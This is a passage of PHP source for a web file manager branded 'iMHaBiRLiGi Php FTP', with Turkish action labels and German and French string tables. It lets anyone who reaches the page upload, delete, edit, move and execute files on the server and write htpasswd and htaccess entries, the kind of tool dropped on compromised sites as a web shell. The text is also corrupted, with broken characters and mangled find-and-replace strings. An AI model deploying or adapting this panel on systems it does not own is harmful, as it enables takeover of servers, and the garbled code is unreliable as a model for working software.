|
$r = $last;
|
|||
|
|
|||
|
while ($l <= $r) {
|
|||
|
|
|||
|
while ($array[$l][$key] < $cmp) $l++;
|
|||
|
while ($array[$r][$key] > $cmp) $r--;
|
|||
|
|
|||
|
if ($l <= $r) {
|
|||
|
|
|||
|
$tmp = $array[$l];
|
|||
|
$array[$l] = $array[$r];
|
|||
|
$array[$r] = $tmp;
|
|||
|
|
|||
|
$l++;
|
|||
|
$r--;
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
quicksort($array, $first, $r, $key);
|
|||
|
quicksort($array, $l, $last, $key);
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function permission_octal2string ($mode) {
|
|||
|
|
|||
|
if (($mode & 0xC000) === 0xC000) {
|
|||
|
$type = 's';
|
|||
|
} elseif (($mode & 0xA000) === 0xA000) {
|
|||
|
$type = 'l';
|
|||
|
} elseif (($mode & 0x8000) === 0x8000) {
|
|||
|
$type = '-';
|
|||
|
} elseif (($mode & 0x6000) === 0x6000) {
|
|||
|
$type = 'b';
|
|||
|
} elseif (($mode & 0x4000) === 0x4000) {
|
|||
|
$type = 'd';
|
|||
|
} elseif (($mode & 0x2000) === 0x2000) {
|
|||
|
$type = 'c';
|
|||
|
} elseif (($mode & 0x1000) === 0x1000) {
|
|||
|
$type = 'p';
|
|||
|
} else {
|
|||
|
$type = '?';
|
|||
|
}
|
|||
|
|
|||
|
$owner = ($mode & 00400) ? 'r' : '-';
|
|||
|
$owner .= ($mode & 00200) ? 'w' : '-';
|
|||
|
if ($mode & 0x800) {
|
|||
|
$owner .= ($mode & 00100) ? 's' : 'S';
|
|||
|
} else {
|
|||
|
$owner .= ($mode & 00100) ? 'x' : '-';
|
|||
|
}
|
|||
|
|
|||
|
$group = ($mode & 00040) ? 'r' : '-';
|
|||
|
$group .= ($mode & 00020) ? 'w' : '-';
|
|||
|
if ($mode & 0x400) {
|
|||
|
$group .= ($mode & 00010) ? 's' : 'S';
|
|||
|
} else {
|
|||
|
$group .= ($mode & 00010) ? 'x' : '-';
|
|||
|
}
|
|||
|
|
|||
|
$other = ($mode & 00004) ? 'r' : '-';
|
|||
|
$other .= ($mode & 00002) ? 'w' : '-';
|
|||
|
if ($mode & 0x200) {
|
|||
|
$other .= ($mode & 00001) ? 't' : 'T';
|
|||
|
} else {
|
|||
|
$other .= ($mode & 00001) ? 'x' : '-';
|
|||
|
}
|
|||
|
|
|||
|
return $type . $owner . $group . $other;
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function is_script ($filename) {
|
|||
|
return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
|
|||
|
}
|
|||
|
|
|||
|
function getmimetype ($filename) {
|
|||
|
static $mimes = array(
|
|||
|
'\.jpg$|\.jpeg$' => 'image/jpeg',
|
|||
|
'\.gif$' => 'image/gif',
|
|||
|
'\.png$' => 'image/png',
|
|||
|
'\.html$|\.html$' => 'text/html',
|
|||
|
'\.txt$|\.asc$' => 'text/plain',
|
|||
|
'\.xml$|\.xsl$' => 'application/xml',
|
|||
|
'\.pdf$' => 'application/pdf'
|
|||
|
);
|
|||
|
|
|||
|
foreach ($mimes as $regex => $mime) {
|
|||
|
if (eregi($regex, $filename)) return $mime;
|
|||
|
}
|
|||
|
|
|||
|
// return 'application/octet-stream';
|
|||
|
return 'text/plain';
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function del ($file) {
|
|||
|
global $delim;
|
|||
|
|
|||
|
if (!@is_link($file) && !file_exists($file)) return false;
|
|||
|
|
|||
|
if (!@is_link($file) && @is_dir($file)) {
|
|||
|
|
|||
|
if ($dir = @opendir($file)) {
|
|||
|
|
|||
|
$error = false;
|
|||
|
|
|||
|
while (($f = readdir($dir)) !== false) {
|
|||
|
if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
|
|||
|
$error = true;
|
|||
|
}
|
|||
|
}
|
|||
|
closedir($dir);
|
|||
|
|
|||
|
if (!$error) return @rmdir($file);
|
|||
|
|
|||
|
return !$error;
|
|||
|
|
|||
|
} else {
|
|||
|
return false;
|
|||
|
}
|
|||
|
|
|||
|
} else {
|
|||
|
return @unlink($file);
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function addslash ($directory) {
|
|||
|
global $delim;
|
|||
|
|
|||
|
if (substr($directory, -1, 1) != $delim) {
|
|||
|
return $directory . $delim;
|
|||
|
} else {
|
|||
|
return $directory;
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function relative2absolute ($string, $directory) {
|
|||
|
|
|||
|
if (path_is_relative($string)) {
|
|||
|
return simplify_path(addslash($directory) . $string);
|
|||
|
} else {
|
|||
|
return simplify_path($string);
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function path_is_relative ($path) {
|
|||
|
global $win;
|
|||
|
|
|||
|
if ($win) {
|
|||
|
return (substr($path, 1, 1) != ':');
|
|||
|
} else {
|
|||
|
return (substr($path, 0, 1) != '/');
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function absolute2relative ($directory, $target) {
|
|||
|
global $delim;
|
|||
|
|
|||
|
$path = '';
|
|||
|
while ($directory != $target) {
|
|||
|
if ($directory == substr($target, 0, strlen($directory))) {
|
|||
|
$path .= substr($target, strlen($directory));
|
|||
|
break;
|
|||
|
} else {
|
|||
|
$path .= '..' . $delim;
|
|||
|
$directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
|
|||
|
}
|
|||
|
}
|
|||
|
if ($path == '') $path = '.';
|
|||
|
|
|||
|
return $path;
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function simplify_path ($path) {
|
|||
|
global $delim;
|
|||
|
|
|||
|
if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
|
|||
|
$path = realpath($path);
|
|||
|
if (@is_dir($path)) {
|
|||
|
return addslash($path);
|
|||
|
} else {
|
|||
|
return $path;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
$pattern = $delim . '.' . $delim;
|
|||
|
|
|||
|
if (@is_dir($path)) {
|
|||
|
$path = addslash($path);
|
|||
|
}
|
|||
|
|
|||
|
while (strpos($path, $pattern) !== false) {
|
|||
|
$path = str_replace($pattern, $delim, $path);
|
|||
|
}
|
|||
|
|
|||
|
$e = addslashes($delim);
|
|||
|
$regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
|
|||
|
|
|||
|
while (ereg($regex, $path)) {
|
|||
|
$path = ereg_replace($regex, $delim, $path);
|
|||
|
}
|
|||
|
|
|||
|
return $path;
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function human_filesize ($filesize) {
|
|||
|
|
|||
|
$suffices = 'kMGTPE';
|
|||
|
|
|||
|
$n = 0;
|
|||
|
while ($filesize >= 1000) {
|
|||
|
$filesize /= 1024;
|
|||
|
$n++;
|
|||
|
}
|
|||
|
|
|||
|
$filesize = round($filesize, 3 - strpos($filesize, '.'));
|
|||
|
|
|||
|
if (strpos($filesize, '.') !== false) {
|
|||
|
while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
|
|||
|
$filesize = substr($filesize, 0, strlen($filesize) - 1);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
$suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
|
|||
|
|
|||
|
return $filesize . " {$suffix}B";
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function strip (&$str) {
|
|||
|
$str = stripslashes($str);
|
|||
|
}
|
|||
|
|
|||
|
/* ------------------------------------------------------------------------- */
|
|||
|
|
|||
|
function listing_page ($message = null) {
|
|||
|
global $self, $directory, $sort, $reverse;
|
|||
|
|
|||
|
html_header();
|
|||
|
|
|||
|
$list = getlist($directory);
|
|||
|
|
|||
|
if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
|
|||
|
if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;
|
|||
|
|
|||
|
sortlist($list, $sort, $reverse);
|
|||
|
|
|||
|
echo '<h1 style="margin-bottom: 0">iMHaBiRLiGi Php FTP</h1>
|
|||
|
|
|||
|
<form enctype="multipart/form-data" action="' . $self . '" method="post">
|
|||
|
|
|||
|
<table id="main">
|
|||
|
';
|
|||
|
|
|||
|
directory_choice();
|
|||
|
|
|||
|
if (!empty($message)) {
|
|||
|
spacer();
|
|||
|
echo $message;
|
|||
|
}
|
|||
|
|
|||
|
if (@is_writable($directory)) {
|
|||
|
upload_box();
|
|||
|
create_box();
|
|||
|
} else {
|
|||
|
spacer();
|
|||
|
}
|
|||
|
|
|||
|
if ($list) {
|
|||
|
listing($list);
|
|||
|
} else {
|
|||
|
echo error('not_readable', $directory);
|
|||
|
}
|
|||
|
|
|||
|
echo '</table>
|
|||
|
|
|||
|
</form>
|
|||
|
|
|||
|
';
|
|||
|
|
|||
|
html_footer();
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function listing ($list) {
|
|||
|
global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
|
|||
|
|
|||
|
echo '<tr class="listing">
|
|||
|
<th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th>
|
|||
|
';
|
|||
|
|
|||
|
$d = 'dir=' . urlencode($directory) . '&';
|
|||
|
|
|||
|
if (!$reverse && $sort == 'filename') $r = '&reverse=true'; else $r = '';
|
|||
|
echo "\t<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>\n";
|
|||
|
|
|||
|
if (!$reverse && $sort == 'size') $r = '&reverse=true'; else $r = '';
|
|||
|
echo "\t<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n";
|
|||
|
|
|||
|
if (!$win) {
|
|||
|
|
|||
|
if (!$reverse && $sort == 'permission') $r = '&reverse=true'; else $r = '';
|
|||
|
echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>\n";
|
|||
|
|
|||
|
if (!$reverse && $sort == 'owner') $r = '&reverse=true'; else $r = '';
|
|||
|
echo "\t<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>\n";
|
|||
|
|
|||
|
if (!$reverse && $sort == 'group') $r = '&reverse=true'; else $r = '';
|
|||
|
echo "\t<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>\n";
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
echo ' <th class="G<>revler">' . word('G<>revler') . '</th>
|
|||
|
</tr>
|
|||
|
';
|
|||
|
|
|||
|
for ($i = 0; $i < sizeof($list); $i++) {
|
|||
|
$file = $list[$i];
|
|||
|
|
|||
|
$timestamps = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
|
|||
|
$timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
|
|||
|
$timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
|
|||
|
|
|||
|
echo '<tr class="listing">
|
|||
|
<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
|
|||
|
<td class="filename" title="' . html($timestamps) . '">';
|
|||
|
|
|||
|
if ($file['is_link']) {
|
|||
|
|
|||
|
echo '<img src="' . $self . '?image=link" alt="link" /> ';
|
|||
|
echo html($file['filename']) . ' → ';
|
|||
|
|
|||
|
$real_file = relative2absolute($file['target'], $directory);
|
|||
|
|
|||
|
if (@is_readable($real_file)) {
|
|||
|
if (@is_dir($real_file)) {
|
|||
|
echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
|
|||
|
} else {
|
|||
|
echo '<a href="' . $self . '?action=view&file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
|
|||
|
}
|
|||
|
} else {
|
|||
|
echo html($file['target']);
|
|||
|
}
|
|||
|
|
|||
|
} elseif ($file['is_dir']) {
|
|||
|
|
|||
|
echo '<img src="' . $self . '?image=folder" alt="folder" /> [ ';
|
|||
|
if ($win || $file['is_executable']) {
|
|||
|
echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
|
|||
|
} else {
|
|||
|
echo html($file['filename']);
|
|||
|
}
|
|||
|
echo ' ]';
|
|||
|
|
|||
|
} else {
|
|||
|
|
|||
|
if (substr($file['filename'], 0, 1) == '.') {
|
|||
|
echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
|
|||
|
} else {
|
|||
|
echo '<img src="' . $self . '?image=file" alt="file" /> ';
|
|||
|
}
|
|||
|
|
|||
|
if ($file['is_file'] && $file['is_readable']) {
|
|||
|
echo '<a href="' . $self . '?action=view&file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
|
|||
|
} else {
|
|||
|
echo html($file['filename']);
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
if ($file['size'] >= 1000) {
|
|||
|
$human = ' title="' . human_filesize($file['size']) . '"';
|
|||
|
} else {
|
|||
|
$human = '';
|
|||
|
}
|
|||
|
|
|||
|
echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";
|
|||
|
|
|||
|
if (!$win) {
|
|||
|
|
|||
|
echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
|
|||
|
|
|||
|
$l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
|
|||
|
if ($l) echo '<a href="' . $self . '?action=permission&file=' . urlencode($file['path']) . '&dir=' . urlencode($directory) . '">';
|
|||
|
echo html(permission_octal2string($file['permission']));
|
|||
|
if ($l) echo '</a>';
|
|||
|
|
|||
|
echo "</td>\n";
|
|||
|
|
|||
|
if (array_key_exists('owner_name', $file)) {
|
|||
|
echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
|
|||
|
} else {
|
|||
|
echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
|
|||
|
}
|
|||
|
|
|||
|
if (array_key_exists('group_name', $file)) {
|
|||
|
echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
|
|||
|
} else {
|
|||
|
echo "\t<td class=\"group\">{$file['group']}</td>\n";
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
echo ' <td class="G<EFBFBD>revler">
|
|||
|
<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
|
|||
|
';
|
|||
|
|
|||
|
$actions = array();
|
|||
|
if (function_exists('symlink')) {
|
|||
|
$actions[] = 'create_symlink';
|
|||
|
}
|
|||
|
if (@is_writable(dirname($file['path']))) {
|
|||
|
$actions[] = 'Sil';
|
|||
|
$actions[] = 'Degistir';
|
|||
|
$actions[] = 'Tasi';
|
|||
|
}
|
|||
|
if ($file['is_file'] && $file['is_readable']) {
|
|||
|
$actions[] = 'Kopyala';
|
|||
|
$actions[] = 'indir';
|
|||
|
if ($file['is_writable']) $actions[] = 'D<>zenle';
|
|||
|
}
|
|||
|
if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
|
|||
|
$actions[] = 'execute';
|
|||
|
}
|
|||
|
|
|||
|
if (sizeof($actions) > 0) {
|
|||
|
|
|||
|
echo ' <select class="small" name="action' . $i . '" size="1">
|
|||
|
<option value="">' . str_repeat(' ', 30) . '</option>
|
|||
|
';
|
|||
|
|
|||
|
foreach ($actions as $action) {
|
|||
|
echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
|
|||
|
}
|
|||
|
|
|||
|
echo ' </select>
|
|||
|
<input class="small" type="submit" name="submit' . $i . '" value=" > " onfocus="activate(\'other\')" />
|
|||
|
';
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
echo ' </td>
|
|||
|
</tr>
|
|||
|
';
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
echo '<tr class="listing_footer">
|
|||
|
<td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt=">" /></td>
|
|||
|
<td colspan="' . ($cols - 1) . '">
|
|||
|
<input type="hidden" name="num" value="' . sizeof($list) . '" />
|
|||
|
<input type="hidden" name="focus" value="" />
|
|||
|
<input type="hidden" name="olddir" value="' . html($directory) . '" />
|
|||
|
';
|
|||
|
|
|||
|
$actions = array();
|
|||
|
if (@is_writable(dirname($file['path']))) {
|
|||
|
$actions[] = 'Sil';
|
|||
|
$actions[] = 'Tasi';
|
|||
|
}
|
|||
|
$actions[] = 'Kopyala';
|
|||
|
|
|||
|
echo ' <select class="small" name="action_all" size="1">
|
|||
|
<option value="">' . str_repeat(' ', 30) . '</option>
|
|||
|
';
|
|||
|
|
|||
|
foreach ($actions as $action) {
|
|||
|
echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
|
|||
|
}
|
|||
|
|
|||
|
echo ' </select>
|
|||
|
<input class="small" type="submit" name="submit_all" value=" > " onfocus="activate(\'other\')" />
|
|||
|
</td>
|
|||
|
</tr>
|
|||
|
';
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function directory_choice () {
|
|||
|
global $directory, $homedir, $cols, $self;
|
|||
|
|
|||
|
echo '<tr>
|
|||
|
<td colspan="' . $cols . '" id="directory">
|
|||
|
<a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
|
|||
|
<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
|
|||
|
<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
|
|||
|
</td>
|
|||
|
</tr>
|
|||
|
';
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function upload_box () {
|
|||
|
global $cols;
|
|||
|
|
|||
|
echo '<tr>
|
|||
|
<td colspan="' . $cols . '" id="upload">
|
|||
|
' . word('file') . ':
|
|||
|
<input type="file" name="upload" onfocus="activate(\'other\')" />
|
|||
|
<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
|
|||
|
</td>
|
|||
|
</tr>
|
|||
|
';
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function create_box () {
|
|||
|
global $cols;
|
|||
|
|
|||
|
echo '<tr>
|
|||
|
<td colspan="' . $cols . '" id="create">
|
|||
|
<select name="create_type" size="1" onfocus="activate(\'create\')">
|
|||
|
<option value="file">' . word('file') . '</option>
|
|||
|
<option value="directory">' . word('directory') . '</option>
|
|||
|
</select>
|
|||
|
<input type="text" name="create_name" onfocus="activate(\'create\')" />
|
|||
|
<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
|
|||
|
</td>
|
|||
|
</tr>
|
|||
|
';
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function D<EFBFBD>zenle ($file) {
|
|||
|
global $self, $directory, $D<>zenlecols, $D<>zenlerows, $apache, $htpasswd, $htaccess;
|
|||
|
|
|||
|
html_header();
|
|||
|
|
|||
|
echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
|
|||
|
|
|||
|
<form action="' . $self . '" method="post">
|
|||
|
|
|||
|
<table class="dialog">
|
|||
|
<tr>
|
|||
|
<td class="dialog">
|
|||
|
|
|||
|
<textarea name="content" cols="' . $D<>zenlecols . '" rows="' . $D<>zenlerows . '" WRAP="off">';
|
|||
|
|
|||
|
if (array_key_exists('content', $_POST)) {
|
|||
|
echo $_POST['content'];
|
|||
|
} else {
|
|||
|
$f = fopen($file, 'r');
|
|||
|
while (!feof($f)) {
|
|||
|
echo html(fread($f, 8192));
|
|||
|
}
|
|||
|
fclose($f);
|
|||
|
}
|
|||
|
|
|||
|
if (!empty($_POST['user'])) {
|
|||
|
echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
|
|||
|
}
|
|||
|
if (!empty($_POST['basic_auth'])) {
|
|||
|
if ($win) {
|
|||
|
$authfile = str_replace('\\', '/', $directory) . $htpasswd;
|
|||
|
} else {
|
|||
|
$authfile = $directory . $htpasswd;
|
|||
|
}
|
|||
|
echo "\nAuthType Basic\nAuthName "Restricted Directory"\n";
|
|||
|
echo 'AuthUserFile "' . html($authfile) . ""\n";
|
|||
|
echo 'Require valid-user';
|
|||
|
}
|
|||
|
|
|||
|
echo '</textarea>
|
|||
|
|
|||
|
<hr />
|
|||
|
';
|
|||
|
|
|||
|
if ($apache && basename($file) == $htpasswd) {
|
|||
|
echo '
|
|||
|
' . word('user') . ': <input type="text" name="user" />
|
|||
|
' . word('password') . ': <input type="password" name="password" />
|
|||
|
<input type="submit" value="' . word('add') . '" />
|
|||
|
|
|||
|
<hr />
|
|||
|
';
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
if ($apache && basename($file) == $htaccess) {
|
|||
|
echo '
|
|||
|
<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />
|
|||
|
|
|||
|
<hr />
|
|||
|
';
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
echo '
|
|||
|
<input type="hidden" name="action" value="D<EFBFBD>zenle" />
|
|||
|
<input type="hidden" name="file" value="' . html($file) . '" />
|
|||
|
<input type="hidden" name="dir" value="' . html($directory) . '" />
|
|||
|
<input type="reset" value="' . word('reset') . '" id="red_button" />
|
|||
|
<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />
|
|||
|
|
|||
|
</td>
|
|||
|
</tr>
|
|||
|
</table>
|
|||
|
|
|||
|
<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
|
|||
|
|
|||
|
</form>
|
|||
|
|
|||
|
';
|
|||
|
|
|||
|
html_footer();
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function spacer () {
|
|||
|
global $cols;
|
|||
|
|
|||
|
echo '<tr>
|
|||
|
<td colspan="' . $cols . '" style="height: 1em"></td>
|
|||
|
</tr>
|
|||
|
';
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function textfieldsize ($content) {
|
|||
|
|
|||
|
$size = strlen($content) + 5;
|
|||
|
if ($size < 30) $size = 30;
|
|||
|
|
|||
|
return $size;
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function request_dump () {
|
|||
|
|
|||
|
foreach ($_REQUEST as $key => $value) {
|
|||
|
echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
|
|||
|
}
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
/* ------------------------------------------------------------------------- */
|
|||
|
|
|||
|
function html ($string) {
|
|||
|
global $charset;
|
|||
|
return htmlentities($string, ENT_COMPAT, $charset);
|
|||
|
}
|
|||
|
|
|||
|
function word ($word) {
|
|||
|
global $words, $word_charset;
|
|||
|
return htmlentities($words[$word], ENT_COMPAT, $word_charset);
|
|||
|
}
|
|||
|
|
|||
|
function phrase ($phrase, $arguments) {
|
|||
|
global $words;
|
|||
|
static $search;
|
|||
|
|
|||
|
if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
|
|||
|
|
|||
|
for ($i = 0; $i < sizeof($arguments); $i++) {
|
|||
|
$arguments[$i] = nl2br(html($arguments[$i]));
|
|||
|
}
|
|||
|
|
|||
|
$replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
|
|||
|
|
|||
|
return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
function getwords ($lang) {
|
|||
|
global $word_charset, $date_format;
|
|||
|
|
|||
|
switch ($lang) {
|
|||
|
case 'de':
|
|||
|
|
|||
|
$date_format = 'd.m.y H:i:s';
|
|||
|
$word_charset = 'ISO-8859-1';
|
|||
|
|
|||
|
return array(
|
|||
|
'directory' => 'Verzeichnis',
|
|||
|
'file' => 'Datei',
|
|||
|
'filename' => 'Dateiname',
|
|||
|
|
|||
|
'size' => 'Gr<47><72>e',
|
|||
|
'permission' => 'Rechte',
|
|||
|
'owner' => 'Eigner',
|
|||
|
'group' => 'Gruppe',
|
|||
|
'other' => 'Andere',
|
|||
|
'G<>revler' => 'Funktionen',
|
|||
|
|
|||
|
'read' => 'lesen',
|
|||
|
'write' => 'schreiben',
|
|||
|
'execute' => 'ausf<73>hren',
|
|||
|
|
|||
|
'create_symlink' => 'Symlink erstellen',
|
|||
|
'Sil' => 'l<>schen',
|
|||
|
'Degistir' => 'umbenennen',
|
|||
|
'Tasi' => 'verschieben',
|
|||
|
'Kopyala' => 'kopieren',
|
|||
|
'D<>zenle' => 'D<>zenleieren',
|
|||
|
'indir' => 'herunterladen',
|
|||
|
'upload' => 'hochladen',
|
|||
|
'create' => 'erstellen',
|
|||
|
'change' => 'wechseln',
|
|||
|
'save' => 'speichern',
|
|||
|
'set' => 'setze',
|
|||
|
'reset' => 'zur<75>cksetzen',
|
|||
|
'relative' => 'Pfad zum Ziel relativ',
|
|||
|
|
|||
|
'yes' => 'Ja',
|
|||
|
'no' => 'Nein',
|
|||
|
'Geri' => 'zur<75>ck',
|
|||
|
'Yol' => 'Ziel',
|
|||
|
'symlink' => 'Symbolischer Link',
|
|||
|
'no_output' => 'keine Ausgabe',
|
|||
|
|
|||
|
'user' => 'Benutzername',
|
|||
|
'password' => 'Kennwort',
|
|||
|
'add' => 'hinzuf<75>gen',
|
|||
|
'add_basic_auth' => 'HTTP-Basic-Auth hinzuf<75>gen',
|
|||
|
|
|||
|
'uploaded' => '"[%1]" wurde hochgeladen.',
|
|||
|
'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.',
|
|||
|
'already_exists' => '"[%1]" existiert bereits.',
|
|||
|
'created' => '"[%1]" wurde erstellt.',
|
|||
|
'not_created' => '"[%1]" konnte nicht erstellt werden.',
|
|||
|
'really_Sil' => 'Sollen folgende Dateien wirklich gel<65>scht werden?',
|
|||
|
'Sild' => "Folgende Dateien wurden gel<65>scht:\n[%1]",
|
|||
|
'not_Sild' => "Folgende Dateien konnten nicht gel<65>scht werden:\n[%1]",
|
|||
|
'Degistir_file' => 'Benenne Datei um:',
|
|||
|
'Degistird' => '"[%1]" wurde in "[%2]" umbenannt.',
|
|||
|
'not_Degistird' => '"[%1] konnte nicht in "[%2]" umbenannt werden.',
|
|||
|
'Tasi_files' => 'Verschieben folgende Dateien:',
|
|||
|
'Tasid' => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]",
|
|||
|
'not_Tasid' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]",
|
|||
|
'Kopyala_files' => 'Kopiere folgende Dateien:',
|
|||
|
'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]",
|
|||
|
'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]",
|
|||
|
'not_D<5F>zenleed' => '"[%1]" kann nicht D<>zenleiert werden.',
|
|||
|
'executed' => "\"[%1]\" wurde erfolgreich ausgef<65>hrt:\n{%2}",
|
|||
|
'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgef<65>hrt werden:\n{%2}",
|
|||
|
'saved' => '"[%1]" wurde gespeichert.',
|
|||
|
'not_saved' => '"[%1]" konnte nicht gespeichert werden.',
|
|||
|
'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.',
|
|||
|
'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.',
|
|||
|
'permission_for' => 'Rechte f<>r "[%1]":',
|
|||
|
'permission_set' => 'Die Rechte f<>r "[%1]" wurden auf [%2] gesetzt.',
|
|||
|
'permission_not_set' => 'Die Rechte f<>r "[%1]" konnten nicht auf [%2] gesetzt werden.',
|
|||
|
'not_readable' => '"[%1]" kann nicht gelesen werden.'
|
|||
|
);
|
|||
|
|
|||
|
case 'fr':
|
|||
|
|
|||
|
$date_format = 'd.m.y H:i:s';
|
|||
|
$word_charset = 'ISO-8859-1';
|
|||
|
|
|||
|
return array(
|
|||
|
'directory' => 'R<>pertoire',
|
|||
|
'file' => 'Fichier',
|
|||
|
'filename' => 'Nom fichier',
|
|||
|
|
|||
|
'size' => 'Taille',
|
|||
|
'permission' => 'Droits',
|
|||
|
'owner' => 'Propri<72>taire',
|
|||
|
'group' => 'Groupe',
|
|||
|
'other' => 'Autres',
|
|||
|
'G<>revler' => 'Fonctions',
|
|||
|
|
|||
|
'read' => 'Lire',
|
|||
|
'write' => 'Ecrire',
|
|||
|
'execute' => 'Ex<45>cuter',
|
|||
|
|
|||
|
'create_symlink' => 'Cr<43>er lien symbolique',
|
|||
|
'Sil' => 'Effacer',
|
|||
|
'Degistir' => 'Renommer',
|
|||
|
'Tasi' => 'D<>placer',
|
|||
|
'Kopyala' => 'Copier',
|
|||
|
'D<>zenle' => 'Ouvrir',
|
|||
|
'indir' => 'T<>l<EFBFBD>charger sur PC',
|
|||
|
'upload' => 'T<>l<EFBFBD>charger sur serveur',
|
|||
|
'create' => 'Cr<43>er',
|
|||
|
'change' => 'Changer',
|
|||
|
'save' => 'Sauvegarder',
|
|||
|
'set' => 'Ex<45>cuter',
|
|||
|
'reset' => 'R<>initialiser',
|
|||
|
'relative' => 'Relatif',
|
|||
|
|
|||
|
'yes' => 'Oui',
|
|||
|
'no' => 'Non',
|
|||
|
'Geri' => 'Retour',
|
|||
|
'Yol' => 'Yol',
|
|||
|
'symlink' => 'Lien symbollique',
|
|||
|
'no_output' => 'Pas de sortie',
|
|||
|
|
|||
|
'user' => 'Utilisateur',
|
|||
